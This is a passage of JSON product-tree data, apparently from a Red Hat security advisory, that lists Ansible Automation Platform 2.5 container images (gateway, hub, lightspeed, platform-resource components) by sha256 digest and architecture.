"product_reference": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
